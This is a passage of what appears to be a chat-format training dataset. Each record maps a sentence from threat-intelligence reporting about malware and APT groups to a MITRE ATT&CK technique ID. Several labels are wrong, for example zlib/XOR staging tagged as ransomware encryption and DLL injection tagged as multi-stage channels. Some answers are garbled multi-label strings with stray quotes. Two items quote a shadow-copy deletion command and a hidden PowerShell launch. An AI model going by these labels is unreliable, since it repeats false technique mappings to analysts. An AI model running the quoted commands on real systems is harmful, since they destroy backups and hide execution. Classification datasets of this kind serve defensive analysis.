- "content": "Heyoka Backdoor can use spoofed DNS requests to create a bidirectional tunnel between a compromised host and its C2 servers."
- },
- {
- "role": "assistant",
- "content": "T1572 - Protocol Tunneling"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "The malware scans for both open TCP ports 135 (RPC) and 1433(MSSQL) against the target, be it internal or external, and probes for the credential weakness in attempt to gain unauthorized access"
- },
- {
- "role": "assistant",
- "content": "T1046 - Network Service Discovery"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "First, the malware checks for the existence of a Mutex value, “EKANS”, on the victim. Otherwise, the Mutex value is set and encryption moves forward using standard encryption library functions. Primary functionality on victim systems is achieved via Windows Management Interface (WMI) calls, which begins executing encryption operations and removes Volume Shadow Copy backups on the victim"
- },
- {
- "role": "assistant",
- "content": "T1047 - Windows Management Instrumentation"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "S-Type may save itself as a file named `msdtc.exe`, which is also the name of the legitimate Microsoft Distributed Transaction Coordinator service binary."
- },
- {
- "role": "assistant",
- "content": "T1036.005 - Masquerading: Match Legitimate Name or Location"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "has attempted to get users to launch malicious Microsoft Word attachments delivered via spearphishing emails."
- },
- {
- "role": "assistant",
- "content": "T1204 - User Execution"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "has updated and modified its malware, resulting in different hash values that evade detection."
- },
- {
- "role": "assistant",
- "content": "T1027.005 - Indicator Removal from Tools"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "When connecting to web shells on a target network GALLIUM has been observed employing Taiwan-based servers. Observed IP addresses appear to be exclusive to GALLIUM, have little to no legitimate activity, and are reused in multiple operations. These servers provide high fidelity pivot points during an investigation"
- },
- {
- "role": "assistant",
- "content": "T1583.004 - Server"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Kimsuky has compromised legitimate sites and used them to distribute malware."
- },
- {
- "role": "assistant",
- "content": "T1584.001 - Domains"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Sandworm Team has used a keylogger to capture keystrokes by using the SetWindowsHookEx function."
- },
- {
- "role": "assistant",
- "content": "T1056.001 - Input Capture: Keylogging"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "BazarLoader is Windows-based malware spread through various methods involving email"
- },
- {
- "role": "assistant",
- "content": "T1588.001 - Malware', 'T1587.001 - Malware', 'T1566.002 - Phishing: Spearphishing Link', 'T1566.001 - Phishing: Spearphishing Attachment', 'T1534 - Internal Spearphishing', 'T1598.002 - Spearphishing Attachment', 'T1566 - Phishing"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "WastedLocker created and established a service that runs until the encryption process is complete."
- },
- {
- "role": "assistant",
- "content": "T1543.003 - Create or Modify System Process: Windows Service"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Pandora has the ability to encrypt communications with D3DES."
- },
- {
- "role": "assistant",
- "content": "T1573.001 - Symmetric Cryptography"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Sidewinder has used LNK files to download remote files to the victim's network."
- },
- {
- "role": "assistant",
- "content": "T1105 - Ingress Tool Transfer"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Data copies to the staging area is compressed with zlib. Bytes are rotated by four positions and XOR'ed with 0x23."
- },
- {
- "role": "assistant",
- "content": "T1486 - Data Encrypted for Impact"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "China Chopper's server component is capable of opening a command terminal."
- },
- {
- "role": "assistant",
- "content": "T1059.003 - Command and Scripting Interpreter: Windows Command Shell"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "We observed the threat group upload a second stage malware, known as BUBBLEWRAP (also known as Backdoor.APT.FakeWinHTTPHelper) to their Dropbox account along with the following command"
- },
- {
- "role": "assistant",
- "content": "T1049 - System Network Connections Discovery', 'T1069.001 - Permission Groups Discovery: Local Groups"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "KOCTOPUS has been distributed as a malicious link within an email."
- },
- {
- "role": "assistant",
- "content": "T1566.002 - Phishing: Spearphishing Link"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Mustang Panda has encrypted C2 communications with RC4."
- },
- {
- "role": "assistant",
- "content": "T1573.001 - Symmetric Cryptography"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "has run whoami on a victim."
- },
- {
- "role": "assistant",
- "content": "T1033 - System Owner/User Discovery"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "The malware accomplishes this through querying the netsvc group value data located in the svchost group registry key which is HKLM\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\SvcHost"
- },
- {
- "role": "assistant",
- "content": "T1012 - Query Registry"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "The injection function is responsible for resolving all the required API calls. It then opens a handle to the target process by using the OpenProcess API. It uses the SizeOfImage field in the NT header of the DLL to be injected into allocated space into the target process along with a separate space for the init_dll function. The purpose of the init_dll function is to initialize the injected DLL and then pass the control flow to the entry point of the DLL. One thing to note here is a simple CreateRemoteThread method is used to start a thread inside the target process unlike the KernelCallbackTable technique used in our macro"
- },
- {
- "role": "assistant",
- "content": "T1104 - Multi-Stage Channels"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "The \"ZJ\" variant of BACKSPACE allows \"ZJ link\" infections with Internet access to relay traffic from \"ZJ listen\" to a command server."
- },
- {
- "role": "assistant",
- "content": "T1090.001 - Proxy: Internal Proxy"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "The malware sample contains some interesting static artifacts including self-signed digital certificates used to sign the executable purporting to be software from the Foxit Software Incorporated company based in California"
- },
- {
- "role": "assistant",
- "content": "T1553.002 - Code Signing', 'T1553.002 - Code Signing"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "APT32 is widely known to use such social engineering techniques to trick a user into enabling macros, after which a file downloads multiple malicious payloads from remote servers."
- },
- {
- "role": "assistant",
- "content": "T1586.001 - Social Media Accounts"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "creates a backdoor through which remote attackers can start a remote shell."
- },
- {
- "role": "assistant",
- "content": "T1059 - Command and Scripting Interpreter"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "has used the command-line interface."
- },
- {
- "role": "assistant",
- "content": "T1059 - Command and Scripting Interpreter"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Once deployed, Prestige ransomware payloads will drop ransom notes named \"\"README.txt\"\" in the root directory of each drive it encrypts."
- },
- {
- "role": "assistant",
- "content": "T1486 - Data Encrypted for Impact"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "PoshC2 contains modules, such as \"Get-LocAdm\" for enumerating permission groups."
- },
- {
- "role": "assistant",
- "content": "T1069.001 - Permission Groups Discovery: Local Groups"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Octopus has used HTTP GET and POST requests for C2 communications."
- },
- {
- "role": "assistant",
- "content": "T1071.001 - Application Layer Protocol: Web Protocols"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Delete the shadow volumes with vssadmin (“vssadmin Delete Shadows /all /quiet”). - Resize the shadow storage for all units starting from C to H units’ letters (hardcoded letters) to avoid the shadow volumes being made again. Using bcedit program to disable the recovery options in the boot of the machine and set to ignore any failure in the boot warning the user"
- },
- {
- "role": "assistant",
- "content": "T1490 - Inhibit System Recovery"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "FIN7 used legitimate services like Google Docs, Google Scripts, and Pastebin for C2."
- },
- {
- "role": "assistant",
- "content": "T1102.002 - Bidirectional Communication"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "PoshC2 contains modules, such as \"Get-ComputerInfo\", for enumerating common system information."
- },
- {
- "role": "assistant",
- "content": "T1082 - System Information Discovery"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Office365DCOMCheck.ps1 and SystemDiskClean.ps1): wscript.exe \"Office365DCOMCheck.vbs\" \\\"PowerShell.exe -ExecutionPolicy bypass -WindowStyle hidden -NoProfile '' \\\" After setting up persistent access, the payload checks to see if a value exists within a registry key in the HKCU hive whose name is the same as the scheduled task (ex"
- },
- {
- "role": "assistant",
- "content": "T1036 - Masquerading', 'T1012 - Query Registry"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "This DLL file creates a scheduled task named BaiduUpdateTask1, which attempts to run the malicious, spoofed MSBuild.exe every subsequent minute"
- },
- {
- "role": "assistant",
- "content": "T1053.005 - Scheduled Task/Job: Scheduled Task', 'T1036 - Masquerading"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Basically, the shellcode’s main purpose is to launch other code stored in the registry key \\REGISTRY\\SOFTWARE\\Microsoft\\DRM. Below is the disassembled shellcode and commentaries for interested readers"
- },
- {
- "role": "assistant",
- "content": "T1012 - Query Registry"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Otherwise, the Trojan will attempt to parse the response for a command, specifically by splitting the decode response on <> and treating the text to the left of the <> string as the command the text to the right as the command arguments"
- },
- {
- "role": "assistant",
- "content": "T1059 - Command and Scripting Interpreter"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Create processes - Write responses from the control server to a file - Send information for all drives - Write data sent by the control server to a temporary file matching the file path pattern %temp%\\DWS00* - Change the time of a file as specified by the control server"
- },
- {
- "role": "assistant",
- "content": "T1070.006 - Indicator Removal on Host: Timestomp"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "APT40 leverages exploits in their phishing operations, often weaponizing vulnerabilities within days of their disclosure"
- },
- {
- "role": "assistant",
- "content": "T1068 - Exploitation for Privilege Escalation"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "APT28 has used compromised Office 365 service accounts with Global Administrator privileges to collect email from user inboxes."
- },
- {
- "role": "assistant",
- "content": "T1078.004 - Valid Accounts: Cloud Accounts"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "ZxShell can query the netsvc group value data located in the svchost group Registry key."
- },
- {
- "role": "assistant",
- "content": "T1012 - Query Registry"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Layer 2 uses a classic Adobe Flash Player Vector corruption technique to develop its heap corruption vulnerability to a full relative read/write available to ActionScript3. In this technique, the attacker sprays Adobe Flash Player Vectors to the heap, and triggers a write vulnerability to change the size of one of the vectors. For more details on this technique, see Flash in 2015"
- },
- {
- "role": "assistant",
- "content": "T1203 - Exploitation for Client Execution"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Kevin has Base64-encoded its configuration file."
- },
- {
- "role": "assistant",
- "content": "T1027 - Obfuscated Files or Information"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "The biggest change is the network communication with the C2 server. The malware does not use a raw socket anymore but all the communications are performed with WinInet. The malware performs connection to the C2 server by using InternetOpenA() with an hardcoded User-Agent: \"Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; .NET CLR 1.1.4322\". Note the missing parenthesis at the end of the User-Agent. This variant has exactly the same features as the previous variant: file listing, OS version getting, process killing, drive listing, execution via ShellExecuteW(), execution via named pipe, cleaning, file removal, file downloading. On the left a sample from Bisonal 2014 and on the right Bisonal 2011"
- },
- {
- "role": "assistant",
- "content": "T1095 - Non-Application Layer Protocol"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Figure 2 – The GitHub profile for F0R3X containing both legitimate forked code and the binaries created by the attacker"
- },
- {
- "role": "assistant",
- "content": "T1140 - Deobfuscate/Decode Files or Information"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Poseidon Group tools attempt to spoof anti-virus processes as a means of self-defense."
- },
- {
- "role": "assistant",
- "content": "T1036.005 - Masquerading: Match Legitimate Name or Location"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "has downloaded additional code and files from servers onto victims."
- },
- {
- "role": "assistant",
- "content": "T1105 - Ingress Tool Transfer"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "STARWHALE has the ability to hex-encode collected data from an infected host."
- },
- {
- "role": "assistant",
- "content": "T1132.001 - Data Encoding: Standard Encoding"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Bazar can implement DGA using the current date as a seed variable."
- },
- {
- "role": "assistant",
- "content": "T1568.002 - Domain Generation Algorithms"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "has the ability to modify the Registry."
- },
- {
- "role": "assistant",
- "content": "T1112 - Modify Registry"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "ThreatNeedle chooses its payload creation path from a randomly selected service name from netsvc."
- },
- {
- "role": "assistant",
- "content": "T1036.005 - Masquerading: Match Legitimate Name or Location"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Then, it modifies the Team Viewer registry settings. As we said, the Team Viewer components used in this campaign are not the original ones. They are slightly modified. The malware author replaced all the entries of “Teamviewer” strings in Team Viewer components. TeamViewer client registry settings are then HKLMSoftwareGoldstagerVersion5 and HKLMSoftwareCoinstagerVersion5 correspondingly. The launcher sets up several registry values that control how the remote access tool will work. This parameter represents a hash of the password with which a remote user has to connect to Team Viewer client. After that, the starter executes the very Team Viewer client netsvcs.exe"
- },
- {
- "role": "assistant",
- "content": "T1219 - Remote Access Software"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Bumblebee can download and execute additional payloads including through the use of a `Dex` command."
- },
- {
- "role": "assistant",
- "content": "T1105 - Ingress Tool Transfer"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Lazarus Group has used LinkedIn to identify and target specific employees within a chosen organization."
- },
- {
- "role": "assistant",
- "content": "T1593.001 - Social Media"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "HAMMERTOSS is controlled via commands that are appended to image files."
- },
- {
- "role": "assistant",
- "content": "T1001.002 - Data Obfuscation via Steganography"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Pay2Key can remove its log file from disk."
- },
- {
- "role": "assistant",
- "content": "T1070.004 - Indicator Removal on Host: File Deletion"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "ServHelper will attempt to enumerate the username of the victim."
- },
- {
- "role": "assistant",
- "content": "T1033 - System Owner/User Discovery"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Peirates can query the query AWS and GCP metadata APIs for secrets."
- },
- {
- "role": "assistant",
- "content": "T1552.005 - Unsecured Credentials: Cloud Instance Metadata API"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "QuietSieve can collect files from a compromised host."
- },
- {
- "role": "assistant",
- "content": "T1005 - Data from Local System"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "DropBook has used legitimate web services to exfiltrate data."
- },
- {
- "role": "assistant",
- "content": "T1567 - Exfiltration Over Web Service"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Mosquito stores configuration values under the Registry key \"HKCU\\Software\\Microsoft\\[dllname]\" and modifies Registry keys under \"HKCR\\CLSID\\...\\InprocServer32\"with a path to the launcher."
- },
- {
- "role": "assistant",
- "content": "T1112 - Modify Registry"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Malware Delivery Method In all emails sent to these government officials, the actor used the same attachment: a malicious Microsoft Word document that exploited the CVE-2012-0158 vulnerability to drop a malicious payload"
- },
- {
- "role": "assistant",
- "content": "T1598.002 - Spearphishing Attachment"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "HAYMAKER is a backdoor that can download and execute additional payloads in the form of modules. It communicates encoded system information to a single hard coded command and control (C2) server, using the system’s default User-Agent string. BUGJUICE is a backdoor that is executed by launching a benign file and then hijacking the search order to load a malicious dll into it. It has the capability to find files, enumerate drives, exfiltrate data, take screenshots and provide a reverse shell. SNUGRIDE is a backdoor that communicates with its C2 server through HTTP requests. The malware’s capabilities include taking a system survey, access to the filesystem, executing commands and a reverse shell"
- },
- {
- "role": "assistant",
- "content": "T1059.003 - Command and Scripting Interpreter: Windows Command Shell"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "During Operation Wocao, threat actors used the `tasklist` command to search for one of its backdoors."
- },
- {
- "role": "assistant",
- "content": "T1007 - System Service Discovery"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "SNUGRIDE is capable of executing commands and spawning a reverse shell."
- },
- {
- "role": "assistant",
- "content": "T1059.003 - Command and Scripting Interpreter: Windows Command Shell"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "WellMail can archive files on the compromised host."
- },
- {
- "role": "assistant",
- "content": "T1560 - Archive Collected Data"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "During Night Dragon, threat actors sent spearphishing emails containing links to compromised websites where malware was downloaded."
- },
- {
- "role": "assistant",
- "content": "T1566.002 - Phishing: Spearphishing Link"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Then calls the fcL4qOb4 function to set the scheduled task and disguise as the one used by Google"
- },
- {
- "role": "assistant",
- "content": "T1036.004 - Masquerading: Masquerade Task or Service', 'T1053.005 - Scheduled Task/Job: Scheduled Task"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "has used compromised WordPress blogs as C2 servers."
- },
- {
- "role": "assistant",
- "content": "T1102 - Web Service"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "POWERSOURCE queries Registry keys in preparation for setting Run keys to achieve persistence."
- },
- {
- "role": "assistant",
- "content": "T1012 - Query Registry"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Cobalt Group has used Registry Run keys for persistence. The group has also set a Startup path to launch the PowerShell shell command and download Cobalt Strike."
- },
- {
- "role": "assistant",
- "content": "T1547.001 - Boot or Logon Autostart Execution: Registry Run Keys / Startup Folder"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Remsec can exfiltrate data via a DNS tunnel or email, separately from its C2 channel."
- },
- {
- "role": "assistant",
- "content": "T1048.003 - Exfiltration Over Alternative Protocol: Exfiltration Over Unencrypted/Obfuscated Non-C2 Protocol"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "has commands to delete files and persistence mechanisms from the victim."
- },
- {
- "role": "assistant",
